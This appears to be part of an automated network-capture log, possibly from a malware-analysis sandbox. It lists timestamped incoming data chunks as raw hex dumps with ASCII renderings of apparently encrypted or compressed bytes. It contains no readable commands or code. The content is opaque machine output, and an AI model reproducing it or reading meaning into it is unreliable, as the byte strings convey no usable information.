                                                                                                                                                            2022-09-29 12:44:59 UTC6725INData Raw: 62 03 f9 4a 3a ba b8 36 18 2a ca c2 d8 b8 9f 3c ec fb 14 64 86 4b 3a b3 62 73 53 f6 af 8e d0 17 f4 99 04 2c 62 05 ce 6e 2a fd e4 fa 8b a6 32 60 d0 b7 72 d5 3a ec 29 40 3a 01 e2 8c 43 87 2f 66 ff 66 f7 f0 ba 8a 2e 0e b4 84 f1 09 5f a3 d7 9d df 1a 3a 13 30 7e 21 c9 a0 93 5f 9e 61 8c ea 87 bd d5 98 b3 b7 fe 54 eb c8 a4 63 83 06 a4 03 03 c7 ce 51 c8 37 a1 68 a0 ae e7 89 f3 33 ae 15 d8 c8 d3 8c 55 7d e0 c0 db 06 2c 7b d7 29 e1 45 cf 27 7a 2a af 7c 41 d1 8d 8f ec 5d 9c 2b 2a 8a c4 36 7b e8 67 86 ac fc 11 5e b6 1b 3c 9a 41 7c f9 ac d4 d4 f4 58 3d ca 9a 85 8c 64 e2 26 7c 41 78 be 07 6c c4 94 47 f2 35 5f c7 aa 86 40 d5 27 72 b1 dd 51 da d2 b7 56 fb eb e6 71 12 d0 d3 43 36 fb be e4 2a 32 5d ae cf 62 2c d8 6d 81 c4 d6 d2 4b 48 42 19 a2 fe ed f0 83 a4 83 f3 31 52 b4
                                                                                                                                                            Data Ascii: bJ:6*<dK:bsS,bn*2`r:)@:C/ff._:0~!_aTcQ7h3U},{)E'z*|A]+*6{g^<A|X=d&|AxlG5_@'rQVqC6*2]b,mKHB1R
                                                                                                                                                            2022-09-29 12:44:59 UTC6730INData Raw: dd 17 db 8a 44 3d a6 f7 8d 56 85 6f 28 a0 7d 85 63 b1 0e 56 8e f0 17 e5 2c 9f 6d 52 71 0e 98 fa 78 fd ec 56 83 c7 f2 c1 07 93 62 07 c5 ff c5 70 da bd 0b 43 1f dc e8 e9 57 4f cb 71 d1 54 38 9f 6e 59 af 86 15 70 40 b6 ad e1 94 74 4d c5 a0 15 f8 97 a7 62 02 4e 20 80 0f 64 54 8f 43 ec a4 80 78 9d cc 16 51 76 c0 84 e2 5d 28 f2 b3 6a 62 c5 35 5b 1a 82 bb 81 14 a9 5c 3d 07 73 22 d1 8f cc 3e f1 e4 ba f0 56 a4 89 b4 08 00 63 48 cb a9 03 13 d0 8d 9f 6a 11 be 22 74 22 3f 21 f4 2f fe 69 79 a0 1c 07 a8 6e ce c5 4b ec d7 47 b9 86 46 5f 44 4f 4d e3 c1 d8 b0 d1 95 af 32 00 33 6f 7c fa b5 5c 8a d3 8f d1 3d 0d 94 da b3 f1 80 a0 15 36 f3 16 ed 59 dd f8 ad 60 dc ac 01 a5 71 7f 09 03 cd cd 81 f1 10 fd 54 ad 26 ec 80 d8 9e 6a e2 78 07 b4 62 9b 60 28 8a a9 7d 5d 83 f0 eb dd 09
                                                                                                                                                            Data Ascii: D=Vo(}cV,mRqxVbpCWOqT8nYp@tMbN dTCxQv](jb5[\=s">VcHj"t"?!/iynKGF_DOM23o|\=6Y`qT&jxb`(}]
                                                                                                                                                            2022-09-29 12:44:59 UTC6746INData Raw: 54 8c 3a 36 a9 db d8 26 28 e1 fc 0a 42 65 f5 e1 0a 10 57 f8 90 de fe cf e6 6d 2c f4 3a cf 36 18 c0 7e fe 28 73 3f 82 a5 69 69 9c ba 66 63 f7 96 24 7a a2 d9 d2 11 0b 65 d5 c3 9e 66 f5 7d 43 8c 57 34 ae 69 91 6d 26 db 20 a2 fc 06 ad ba 39 ee e1 ab d0 c0 af 3b 16 2c 22 ac 40 f5 18 e6 f9 ca 6f a9 a9 c6 17 6c d5 ca 87 26 ac 17 34 e2 92 fe 7d 8c 54 b8 d6 ed bd b6 a2 6d 65 62 26 c6 0d 34 16 7d b1 8f 01 80 13 cf f7 2d 96 9b 29 00 3f f8 ec 82 54 12 fb 0a ef b9 64 43 d3 bc a4 9f aa 7e e3 ce 08 9f d4 cb 43 35 5d d2 01 e0 14 3e db 0a 52 0b 8a d2 f6 32 08 04 d9 6a 69 31 0a bd e6 8e c7 ff 90 e0 b3 90 2e 95 08 1e 5a 9e f7 b2 cf c4 58 13 1b 87 5a 1e a6 fd f8 01 bd 67 00 1f 1d 79 b9 53 21 36 60 0d 2e 4e 12 ef 09 0a f8 63 32 e5 f9 1e 84 5c 9d 64 34 d8 8c 06 31 4d 09 a7 31
                                                                                                                                                            Data Ascii: T:6&(BeWm,:6~(s?iifc$zef}CW4im& 9;,"@ol&4}Tmeb&4}-)?TdC~C5]>R2ji1.ZXZgyS!6`.Nc2\d41M1
                                                                                                                                                            2022-09-29 12:44:59 UTC6762INData Raw: 60 06 4a 58 ae 15 f1 eb f0 98 a1 c0 bb 3f fd c4 33 80 0d df 7c 65 43 44 7b ce 1d 78 e6 1d 1d 6f 8e d1 cd af 3f c8 5d 49 0c 95 dd 51 56 66 a2 a2 11 40 4e 09 47 19 c6 2d c1 44 04 45 be 36 ef 53 c3 5a 4c b7 d0 5c 61 ce 0c af a5 09 f2 65 6d 5f 3f 4e bb 3e d7 29 51 58 1f dc cc 17 69 4a 54 8f dd 6f 4e d2 bd c7 03 69 60 0f e0 db bf a1 28 8f fa 17 a7 04 d6 09 0a e5 0f 0c 64 04 ad fa ab ae 9a 3d 7f 00 dd 94 e9 b1 de 7e 17 52 e9 db fa 7d 7b e3 a5 b5 1d be f7 62 c3 29 42 0f 7d 60 9e 75 b0 92 cd 8a bb 06 48 71 8f d2 0e 63 2d 0a 18 a0 09 8a b9 83 3e a6 bb 60 3d 66 a6 9a 84 e0 a6 dc cd fa 4f 1d 2a 25 65 b7 be cf 63 fb 38 4b 7f f6 fd d3 92 19 b6 3f 43 2b 06 d0 ac d7 c8 b9 c6 95 c1 df 0c 10 d8 07 8c a7 8c 86 eb c3 bf d8 80 40 25 1b bd 9e c1 67 13 67 6a 3e 70 a3 76 14 2c
                                                                                                                                                            Data Ascii: `JX?3|eCD{xo?]IQVf@NG-DE6SZL\aem_?N>)QXiJToNi`(d=~R}{b)B}`uHqc->`=fO*%ec8K?C+@%ggj>pv,
                                                                                                                                                            2022-09-29 12:44:59 UTC6778INData Raw: b1 a1 52 f8 a3 2f 25 9a ad 92 d6 a7 7e 00 6f ab 17 ae 3f bf 36 12 eb 6a c6 e4 f0 48 5d 4a 1a df 54 92 c1 b8 c4 3a 83 4d 90 2d 90 58 6d c7 6b 35 2d 9e 44 01 40 0a f2 f0 dd a4 a9 ba 27 19 1d 19 2d 92 b7 30 15 1c 74 80 0b 29 1b 58 b2 aa 36 3e 29 ee 02 26 af ee 94 c2 ed d4 b4 81 0a ae b4 f4 4f 4d b2 4f fa 23 cf 48 dc 88 2f 1e 22 c4 b4 b0 06 43 ff bf e3 4a 48 85 c1 16 3b 89 bc 64 cd 75 37 c7 47 d9 95 20 ca 0e 4b 90 35 16 fc e5 c6 d7 15 c6 07 a2 b7 06 b4 e3 43 91 bf 0a f2 a0 4c bd 99 ed af 74 03 97 25 35 c6 50 f1 22 78 c3 fa 7a ac a7 1b 22 cf 5d 21 97 ae c1 95 df a0 52 1d 2c 5f bb ce 01 ef 00 ef 65 af 9d 8c 72 6e d4 c9 29 f9 5d 89 f8 4a ee 88 55 e0 a8 4e 9f 60 f1 26 64 de c0 0f 0e eb 63 37 3d 04 37 4e be 01 0c bf e9 3d ab f5 e5 5a ff c3 22 39 41 45 ca 18 d4 a5
                                                                                                                                                            Data Ascii: R/%~o?6jH]JT:M-Xmk5-D@'-0t)X6>)&OMO#H/"CJH;du7G K5CLt%5P"xz"]!R,_ern)]JUN`&dc7=7N=Z"9AE
                                                                                                                                                            2022-09-29 12:44:59 UTC6794INData Raw: 62 79 d1 0b a0 8c bf d1 ba 96 38 95 55 3d 67 ed 51 f2 0f 33 99 33 05 c1 6a f3 4b b9 38 01 05 93 16 d0 ae 3e bf b6 8c c5 82 4d 96 b8 e3 31 4f 90 73 89 9a 70 f1 9e 55 f1 21 9f 76 e8 3c 3c a6 31 b0 dc 9a 22 2e a1 85 18 06 7d 29 40 f7 cf 53 c6 fc c1 c8 15 fe 36 e7 40 66 a3 17 c8 dd 41 c7 df dc 94 29 55 8d e8 5d be b9 54 30 6c 30 13 05 99 05 56 67 e1 82 20 0d 48 12 b4 c5 6c 30 38 ad ad d7 6a 9b 2e 6f 4d c1 de 3d 05 0f 06 08 20 c4 32 19 fc e2 34 7c b8 a2 36 a2 b8 3a 53 b8 47 72 67 3c 59 08 f5 4e 72 fa 0d 7c e7 1e 54 93 bd 82 f9 9e 38 1f 3a 79 6d 99 0a 68 31 1f 1c 86 8e 00 48 f3 97 24 d5 d2 46 b2 0e 2f f0 23 70 15 ea d9 2e 39 58 b9 c0 d2 1d 4e c9 41 cc ff a2 09 a1 95 d7 ca 10 77 1f 35 95 16 09 84 e0 34 c8 42 5b 66 23 c0 c2 ba 84 cc de 78 c8 62 77 b6 48 cb 98 06
                                                                                                                                                            Data Ascii: by8U=gQ33jK8>M1OspU!v<<1".})@S6@fA)U]T0l0Vg Hl08j.oM= 24|6:SGrg<YNr|T8:ymh1H$F/#p.9XNAw54B[f#xbwH
                                                                                                                                                            2022-09-29 12:44:59 UTC6810INData Raw: b4 5e 60 bd 06 9f 41 9b 8a 42 b3 8a bd 7b ea 2a 58 8a 6b 5f 14 58 07 1b 23 a0 45 2b 8b 49 03 57 b6 b0 30 f3 ef 6d 4d 6e 89 f6 4d 29 5c 14 9e ef b8 89 bc 6a 30 4f bd 28 55 ae ce d7 68 26 c8 76 47 55 47 94 8d 25 30 16 3e 19 f7 8d 29 88 3b 7d 42 8c 7a 22 09 c0 82 67 b3 97 82 6f 26 56 2d dd f4 78 c4 a8 9c f2 d3 7b 2c 38 91 19 f6 88 86 56 84 08 e0 6c 96 76 fa 5d 23 39 29 97 10 c3 fd 2c d7 4e d3 33 50 38 92 cf 7d cf 63 db 20 75 07 f4 54 93 62 07 76 1c 0d 01 ec 86 c2 b6 28 09 6d 41 87 0a 08 b0 5d 3c 4e 96 31 6d dd 0e a8 48 ff cd 72 0b 25 92 03 7f ad 82 06 07 89 38 06 c3 2f de 58 cc c9 5f 8f 7f cc 0e 62 aa 89 0f 9c ee 1c 18 55 e0 c0 c6 af eb 46 bd 8e ce 19 22 de c9 f3 21 b3 57 6c 58 0f 83 bd 65 65 dd 40 f0 e4 a6 48 46 e2 92 74 6f 1c 64 de f6 6f b8 1c 26 0f 9f 90
                                                                                                                                                            Data Ascii: ^`AB{*Xk_X#E+IW0mMnM)\j0O(Uh&vGUG%0>);}Bz"go&V-x{,8Vlv]#9),N3P8}c uTbv(mA]<N1mHr%8/X_bUF"!WlXee@HFtodo&
                                                                                                                                                            2022-09-29 12:44:59 UTC6826INData Raw: c6 c8 1a 46 f8 15 91 3f e6 f8 15 6e 57 94 d1 6b 11 5d 07 90 7c d4 db a0 2c d7 73 28 05 28 29 af 55 1b ea 99 89 fd 96 2e 9e 95 ba fc 6c 2c 2a c6 ce ce 37 a8 fb 9f 09 b5 32 77 c0 93 26 a5 1d b9 c0 e1 3c e0 b6 f8 c3 df b8 57 70 b3 2c c9 49 c6 cc ea e1 67 aa a4 23 96 80 5c 8c d9 6e e2 88 b8 d8 cd 60 85 0d 18 36 58 ee 32 e7 96 77 69 a0 74 c3 1f bc fb 34 fc 89 f1 95 81 f7 d2 00 1d b2 57 81 f4 1c c3 99 fb ab 49 1c 8d cd e4 89 59 8d 31 a0 02 dd ee ff e4 3e 7f 0d a3 c8 4f 7c e0 ab 8a a7 16 e6 09 4d ea c3 49 46 49 f9 41 14 37 6e 55 8e 3d 7c a4 0e 8d 7c a6 8c 39 aa a2 67 2f d3 96 28 ff ac ed 1b 77 47 40 fd a2 78 b7 67 64 fa 9f b2 40 40 9b 3b f1 55 4c c1 3a a0 33 18 c6 91 7a 4f 21 1a bd 37 3d 65 97 07 9b da 7a 8a 17 a1 2c 2e cd 82 4d 38 eb 04 98 6a 71 c0 6e d2 ef 3a
                                                                                                                                                            Data Ascii: F?nWk]|,s(()U.l,*72w&<Wp,Ig#\n`6X2wit4WIY1>O|MIFIA7nU=||9g/(wG@xgd@@;UL:3zO!7=ez,.M8jqn:
                                                                                                                                                            2022-09-29 12:44:59 UTC6842INData Raw: 66 6f c9 85 b0 5a 11 97 49 71 6d 87 18 36 a1 d9 4b 1c 9e 21 c5 d6 2b 5d f3 ec f4 58 11 61 f6 33 16 2c 43 9e e2 c7 a0 07 db 5c 6a c4 16 34 30 2a 2e 4a 99 19 cc cc 79 4a 17 03 aa af 0d f5 6a ed fd d8 59 af 50 5f a8 bb 37 03 d0 3d 6e 1f 6b 78 16 95 c3 79 7a 38 33 86 29 e1 a4 cd 17 a8 2b 8d 60 35 2a b3 14 f4 e0 81 b4 6e ed d5 47 5e d3 39 1b dc 34 3c 30 97 b2 9b e7 28 80 29 08 b5 fc 48 29 be bb f5 8c ec b3 2b 62 92 b4 c8 93 5e cb 74 28 dc bc 90 72 c7 7f be 0c 2a 44 03 c1 d9 8e 72 ac 1f d8 1f 65 88 0f c0 1d fd 87 eb 24 fc 08 0f 79 a5 b8 58 a5 58 60 b0 0c 07 a6 22 bc fd ed 24 90 b8 3c 9a 94 d0 be b6 53 b8 12 74 36 57 95 77 18 bb 2e f1 d2 2f 91 72 4a c6 e7 29 10 2a a5 d6 a4 6b 45 5c d8 b6 67 9e 6d 67 b5 52 62 d9 06 21 85 4e f5 29 a2 b8 24 5e c9 2e d4 75 fc a9 27
                                                                                                                                                            Data Ascii: foZIqm6K!+]Xa3,C\j40*.JyJjYP_7=nkxyz83)+`5*nG^94<0()H)+b^t(r*Dre$yXX`"$<St6Ww./rJ)*kE\gmgRb!N)$^.u'
                                                                                                                                                            2022-09-29 12:44:59 UTC6858INData Raw: 95 e5 95 5c 15 dd 7f 45 08 ab 28 a3 ce 9d f7 c0 8c 89 7c c3 1b f0 81 15 aa 3c 43 a6 d8 3e af cc 20 53 cf 49 ce 34 a2 11 c7 80 8e f8 c3 25 b1 7a 5d ad 6e fb e8 f8 54 26 82 2e 73 bc af 7e f3 32 42 fe 31 04 ae 19 15 a9 e0 5f 21 85 93 c8 a6 d7 3d e9 aa b3 01 e9 86 5a 6b c5 25 fe 00 0e d8 39 07 89 2e 12 ff 61 1b 23 f8 6f 5b 4f 0a db a4 bd a3 4b 60 e8 13 3e 3f 49 35 08 0a fa 1f e2 ce c0 f5 c1 7e a1 35 57 ee 28 a2 f4 30 86 2a ef cc c7 72 6a cb 18 14 88 45 25 2d e4 c0 26 31 ff 75 9f 1f 83 a7 9e fd 99 a1 d1 01 65 63 3a d2 9c bf b2 a7 0c 92 97 43 8f b5 8c 79 6d 7b 53 f9 7a c7 50 cd 5e b7 80 2f 6a 67 01 be bf f9 c4 b6 bc e4 76 fa 7a ba f3 22 3d 56 28 a9 b4 d0 77 bc b4 ff d2 13 86 33 d5 ff da aa ad d1 56 e6 85 3c b6 b7 36 43 c1 0b 0b a0 76 39 0a 48 4c 3e a4 fa 3d f7
                                                                                                                                                            Data Ascii: \E(|<C> SI4%z]nT&.s~2B1_!=Zk%9.a#o[OK`>?I5~5W(0*rjE%-&1uec:Cym{SzP^/jgvz"=V(w3V<6Cv9HL>=
                                                                                                                                                            2022-09-29 12:44:59 UTC6874INData Raw: 08 67 40 f8 3a 43 27 99 8c a0 0a 01 86 1d e2 2b 95 71 ca 2d 06 63 a8 86 5c 97 2b f7 46 23 4d aa 68 0f 2e 23 13 27 80 86 68 b6 83 d5 83 29 37 27 ed ab ad 27 45 e5 33 08 2d 19 8a a2 df bf 4a 19 0c a8 90 04 ad 76 06 5e 28 65 c0 c7 84 a5 52 fd 5d 37 0a 8f 5a ce cb 29 d3 c3 80 c3 e0 40 1e 85 41 5c f4 ba 62 75 8a 07 ab 0b 9d 06 9e d5 d7 35 c4 5c 96 7e 45 4a a7 76 66 1a c6 bf 79 fb 89 27 47 2e 26 6b 03 14 40 29 66 9f 81 77 89 fc ac 8c ff cc b9 a1 2c 30 da 47 86 dd e9 ca 45 bc e6 7c cf 62 a2 d8 e1 2a ce 6f e5 57 6c c2 77 c4 bf 42 1e 0c d9 52 20 9d 74 df c9 58 22 dc ed 01 48 2a 54 94 32 5d 75 eb b2 60 c8 27 c0 de 52 d2 6e c3 20 97 f2 5a 23 89 6a 2f 4e 5b b6 6d 20 ee dd c2 38 e3 b9 fb 4b 0c 95 43 98 43 42 4d d6 90 fb 16 e0 6f c6 fc 23 e5 0b 62 49 9f be da 53 49 20
                                                                                                                                                            Data Ascii: g@:C'+q-c\+F#Mh.#'h)7''E3-Jv^(eR]7Z)@A\bu5\~EJvfy'G.&k@)fw,0GE|b*oWlwBR tX"H*T2]u`'Rn Z#j/N[m 8KCCBMo#bISI
                                                                                                                                                            2022-09-29 12:44:59 UTC6890INData Raw: 65 1b 85 97 9d d0 57 3c fb 73 87 de c1 03 4b 53 d5 88 af e0 ff 0d 6c 80 84 b1 70 32 02 74 f0 af 6b 1a 4d d1 d1 4e 8c e3 eb c9 1e f5 38 b0 df ec 10 a6 61 02 69 78 e4 11 16 ed 1c a8 40 65 db db a9 3b 13 4d 7b e5 53 1f 2f b3 52 6e aa 5d a8 23 b6 5e 07 e3 10 22 5d 67 91 a8 c0 1e 8f 53 bd 6c b2 f7 3b c9 54 36 4c a8 02 3b 4d 68 58 0c ef 3c 0b 83 9b 63 6e 0b 75 0a 60 b8 4f f5 c8 cd 17 74 8e 53 d4 62 24 c2 4e 5d cf 6f 43 06 75 ce 50 3c 9e 23 a1 2f 3d 0a 9a 04 6d b6 03 e7 ce 28 22 33 95 31 a2 dd 21 09 ee e0 60 13 18 45 2f 50 de b3 c8 6e 36 37 f5 68 08 8a 7c ce 08 b2 56 84 8a e6 87 74 cc ee b8 75 cd eb a0 20 4a c4 18 13 91 88 7e 06 1f f1 71 36 1d 69 4f fb b9 8e 5b 60 f4 40 25 d0 f7 0d 57 70 42 1e e4 1e 5a b2 9f 8d 48 04 9b c9 73 f3 84 05 fe a9 d3 97 39 a1 5c d9 ff
                                                                                                                                                            Data Ascii: eW<sKSlp2tkMN8aix@e;M{S/Rn]#^"]gSl;T6L;MhX<cnu`OtSb$N]oCuP<#/=m("31!`E/Pn67h|Vtu J~q6iO[`@%WpBZHs9\
                                                                                                                                                            2022-09-29 12:44:59 UTC6906INData Raw: 69 1d 7a fe 3e 35 61 43 95 98 86 81 36 24 7f ed 71 ed 6f 20 15 86 84 f3 6f 01 9f 0f e4 70 e0 ad d8 90 a7 c0 be 90 3e 71 5f e2 45 97 42 ef fc b6 1b 69 c9 48 06 4f 6d ea 70 08 13 b5 0e e6 3d ed 92 7b a8 50 14 c8 84 f4 d8 4a 98 bc 49 9b e0 49 27 0a 98 df 92 86 22 31 f8 cc d7 ed 37 bc e6 0b 17 2c 4a 5f 86 ad 24 b4 e7 a7 49 49 5e 9b 26 dd f0 a5 2f f1 32 42 8d c1 ed 5b 5b 61 46 aa 3d a8 cf b0 d8 b5 9f de 5c 92 c7 b0 5e a1 5a f4 de ba dc 80 f1 22 19 25 51 fc 05 13 08 e0 b6 b4 35 a9 1d 2c 10 dd 2d 80 01 09 b6 ec b2 40 dd 19 94 01 5a bd b4 98 6e 4c 0b 18 43 28 13 50 bb 7e 62 20 4d a0 46 14 f6 59 89 0e 9c 4a 4e 94 71 a6 f4 8a af d8 07 1a 1d 48 de c0 3c 17 d8 6a 31 dc 46 07 c1 e3 b8 d2 bb 4f 9f 4d 5d b5 8d 6a 5b fa da 84 68 ee fc ff 76 98 f6 9f 9d 3d ef 90 2f ca 82
                                                                                                                                                            Data Ascii: iz>5aC6$qo op>q_EBiHOmp={PJII'"17,J_$II^&/2B[[aF=\^Z"%Q5,-@ZnLC(P~b MFYJNqH<j1FOM]j[hv=/
                                                                                                                                                            2022-09-29 12:44:59 UTC6922INData Raw: c5 5c 51 e1 ac 66 68 c1 00 61 d3 77 fa ab 4b c9 0e 36 e3 1e 55 bb 39 ee 74 a9 4d da 78 16 44 36 3d 2b ce bb 7c 9e e6 1f b9 39 fe b7 f1 5a f2 b4 15 ef 57 a6 5c 83 7a 3a e6 af 19 9a 0b ef 6c 85 c5 00 e4 18 f5 bc fb 75 c2 bc 88 9b 6f 96 49 82 66 60 44 9c 60 9f 01 f6 7e 89 f5 db cc 51 9a 14 f0 70 6d de 09 1c c3 3d 3d ab c9 01 96 95 23 54 96 6b ea 63 a7 f1 e9 0f 3a c3 3a 37 62 07 92 84 79 0d 83 6f e8 d9 cd 08 c1 ea f9 de 65 e1 79 98 26 38 86 05 d0 82 c8 fa 2c f0 dd 93 f9 68 8c b8 5d 3f b4 80 49 34 78 12 4e 7c 2a 49 7d f5 0d 9b 46 96 46 ec e1 66 ce 16 75 97 c3 35 4e b3 24 d3 74 41 d6 49 c2 a5 94 04 b8 ab 20 e1 df f9 e4 0c b1 57 77 1a 71 e0 d5 08 bf 3d d2 2a 49 62 e6 d5 21 39 f7 74 7c e1 b0 9c bd f6 ce c2 4c 5b 84 72 d9 0d a0 5a c8 d2 02 05 bc 60 47 11 c0 6d 7a
                                                                                                                                                            Data Ascii: \QfhawK6U9tMxD6=+|9ZW\z:luoIf`D`~Qpm==#Tkc::7byoey&8,h]?I4xN|*I}FFfu5N$tAI Wwq=*Ib!9t|L[rZ`Gmz
                                                                                                                                                            2022-09-29 12:44:59 UTC6938INData Raw: c2 6b 2f 75 15 7a 55 b4 d0 fe 0a da f4 01 06 8f 2f 1f 40 91 4b 96 ca 63 97 4d 96 83 b2 36 43 a4 46 99 75 52 62 52 12 06 8e ec 1b c6 7f 25 79 9a 3b 92 a6 43 d1 21 a1 e5 6a bd 88 75 22 e5 1b 29 c8 a5 77 40 64 10 77 ab 28 be 45 81 ab 28 01 30 f3 e1 98 26 1c 6a 75 c4 fb a5 fe da b9 b5 d4 06 cd f0 71 12 98 71 7b b3 0e 69 69 13 51 9e e5 5f d1 50 84 f5 00 74 d0 df af b7 dc b2 38 2d bd 95 f7 9a ab 3a 42 a6 1a 1a 56 9c 2a 0a 89 0d a4 02 ba 7a 03 d8 bb f9 21 a0 47 74 4f 76 14 e2 35 7c c1 21 4d 31 b7 71 92 49 13 e4 d6 15 c6 93 ec 9a f8 4f db 6d 82 b9 3e 1e 93 57 3a bd 73 1f 83 aa e7 0b 5b b0 c7 b7 21 bb 7f 6b 45 9c 86 81 e7 a9 aa c9 0e fd 34 44 b6 67 81 d0 52 a7 dd 7b 59 81 41 ac a2 58 d5 40 2e 51 a9 de 21 4e 5c 41 08 7d 05 73 61 55 f9 19 73 a6 f6 0e 0e 0c 02 3c 64
                                                                                                                                                            Data Ascii: k/uzU/@KcM6CFuRbR%y;C!ju")w@dw(E(0&juqq{iiQ_Pt8-:BV*z!GtOv5|!M1qIOm>W:s[!kE4DgR{YAX@.Q!N\A}saUs<d
                                                                                                                                                            2022-09-29 12:44:59 UTC6954INData Raw: 8a b4 6d 98 49 59 e2 20 9d d6 68 70 40 f3 eb 29 47 ea 51 20 90 4c 13 41 85 f5 38 c7 56 41 44 83 6c aa 86 cd fa 39 2b 65 f8 05 a8 7c ec 5a 7d 3f 5d 21 0e 8a c4 7b d6 2a 60 51 bb 5f d0 6e 05 58 96 ce 95 b6 87 38 ff 6f 23 6e c8 85 fd 0d a8 ed af 66 04 f9 5c 2b a0 ea db 0f 52 fd 3a 42 64 36 13 e8 09 d4 2f 9f 7c a1 11 36 0a 80 89 a6 28 85 4a f5 3f 03 7f 59 75 a6 f5 b2 e1 69 9c f9 95 73 9f 4a d7 70 83 a2 5f 29 73 7b 81 27 c1 ed 37 89 20 ef ba ba fd b7 b3 90 1f 1c e8 a1 66 cc e5 26 ee 9e 48 88 a0 15 c9 26 fe b9 9e 0b dd ae 28 aa 85 ab 2a 5c 97 76 c5 b8 1a a0 65 0b ee d7 30 25 0c 61 d8 0e dd f8 41 c6 e6 22 4c f5 79 1e bf 84 c4 9f 6b 78 19 09 5d 40 3f 4c 0f f8 e3 99 73 7d bb 00 81 f9 fb 97 0d b7 59 06 56 20 51 95 6e 70 71 34 33 db df aa 67 54 26 7f 8e 58 6d 62 f9
                                                                                                                                                            Data Ascii: mIY hp@)GQ LA8VADl9+e|Z}?]!{*`Q_nX8o#nf\+R:Bd6/|6(J?YuisJp_)s{'7 f&H&(*\ve0%aA"Lykx]@?Ls}YV Qnpq43gT&Xmb
                                                                                                                                                            2022-09-29 12:44:59 UTC6970INData Raw: 58 87 56 0f b4 4b 4c bb d7 51 30 b2 e8 59 bd 41 1d 77 62 96 44 a8 2b f1 b6 3f 9e c3 bb 76 46 86 82 be 0d 79 9d 3d 4f 7c e0 ee f1 4f e2 d1 f8 fb 49 34 b8 01 cf 07 e6 1e b3 65 76 53 bd 13 c7 a6 98 8b ec b3 3c 72 e4 97 48 b5 7a e8 44 f0 d4 5c db 26 db 8e d1 7a 71 0a dd b5 9a 80 fd 02 22 a1 5c 46 2e bb 57 53 24 60 a3 e8 49 0c 9b 2c 17 50 f3 50 b5 bb f5 62 d3 cd b7 c2 0d 10 95 a0 3f 53 bb 87 5f 2c 4f 60 1f 3b 53 ac a6 54 1b 2b 9f ea 0f ae 69 c8 9e 8e 64 44 1e 84 10 e1 ab c2 1e d2 d9 32 82 ab 7e 53 da bf a8 b7 68 04 a3 e5 ba 1c 19 04 58 fe a3 d7 86 ea 13 c3 e9 fe c3 e8 71 f8 85 66 23 3d 2a 2b 4d 5f 37 ee cb 87 b4 04 61 14 6c 3c 50 81 18 c2 fa cc 5e 33 34 c9 5e f7 f0 6c 7b 1d f8 fb 39 1f 14 3b 00 21 eb 79 57 a1 85 28 53 a5 41 a6 9b eb b3 4c be 00 e8 8a 3a 67 25
                                                                                                                                                            Data Ascii: XVKLQ0YAwbD+?vFy=O|OI4evS<rHzD\&zq"\F.WS$`I,PPb?S_,O`;ST+idD2~ShXqf#=*+M_7al<P^34^l{9;!yW(SAL:g%
                                                                                                                                                            2022-09-29 12:44:59 UTC6986INData Raw: 4f 0d b0 d3 f7 c1 da 2e 9d d8 af 4a a7 30 5f bf 3a f8 83 95 46 14 88 90 b7 c6 1e c5 0b 87 d1 24 98 bf fa 76 33 0d 12 6e 3f 41 fa 76 11 03 db b6 46 84 17 70 3c df d9 f2 80 f2 48 e7 45 72 a3 65 1a f6 50 4f ac bf 78 3b aa 76 1d 46 f1 8e eb 83 1e 07 95 eb 4e 91 59 48 9f 5a a1 5f 36 44 7a 23 47 cb 10 de 5c 77 c1 6b fb fe 15 94 8b fa ae 45 a1 40 1b 11 98 2c e3 8f 4e f0 a9 14 18 0a 7f 92 ac d3 f2 a0 83 60 80 b4 5b 1a 4f 9a 6a 65 57 7e 7f 89 70 a7 82 4d 80 1d 2c 01 04 3f cb 7e 21 70 21 e6 fc ca 10 96 21 83 06 1d 79 df c0 7e d7 b6 84 8f dc 68 3f d7 e0 ec 46 4d 2b 73 b1 ed 10 64 fb ed d0 14 a4 71 f6 38 f9 6f a0 cc 1a 2f 3a 70 e1 92 e8 88 6b be 04 72 fe d3 82 6a 66 7b 29 06 63 b4 c5 4d b0 6a 84 4f f1 8c e3 92 a2 a1 d9 60 b5 ca 0e 5e a3 c9 a2 c3 a4 19 dc 0b 33 7a e5
                                                                                                                                                            Data Ascii: O.J0_:F$v3n?AvFp<HErePOx;vFNYHZ_6Dz#G\wkE@,N`[OjeW~pM,?~!p!!y~h?FM+sdq8o/:pkrjf{)cMjO`^3z
                                                                                                                                                            2022-09-29 12:44:59 UTC7002INData Raw: 35 a9 19 fe f8 43 0f 62 b2 4e 81 bb 82 2a c3 67 d4 5e 00 b6 c0 4d 5b 40 6e db 2a 93 6e bd 33 80 fb e8 e6 99 c4 a5 8d a8 1b 80 3b 41 17 2d b5 ee bc eb f6 b3 65 b9 04 63 5d 76 55 fd 10 84 91 cf 5b db ed e1 16 fd 4a 33 a5 9e ca b7 18 cd 39 c8 3b 04 f0 ce f7 e8 26 d1 dc ea 49 55 e6 57 1f 35 1f 0d d1 ce 88 1f de 6a ae 38 14 43 36 5b f7 ba 67 dc 2a 42 ed 9d 6e 82 ba b3 b3 1c a5 d4 f1 08 b9 48 dc f0 b9 b5 38 81 a5 1f 64 bb 29 8b 3b 2d 0e 0e df c9 61 e4 59 5b b3 cc 09 52 dc bb 0f 28 b7 c7 f0 56 8d 91 67 df f6 06 aa d5 8e 52 fd 59 3d 87 82 fb ee 38 73 d8 a4 8e 83 34 16 f1 a4 f3 f9 85 35 b6 c5 fb 85 b5 7e 15 f3 7e 89 28 e9 5e 77 73 85 56 a2 77 7c c8 b2 9d fd 99 8d 53 f4 a8 ef 45 bb 17 c1 cb 23 4a c7 6e dd fd eb b1 a4 aa 23 0d e4 78 6f b2 d3 5d 52 0f ce 07 a8 99 9a
                                                                                                                                                            Data Ascii: 5CbN*g^M[@n*n3;A-ec]vU[J39;&IUW5j8C6[g*BnH8d);-aY[R(VgRY=8s45~~(^wsVw|SE#Jn#xo]R
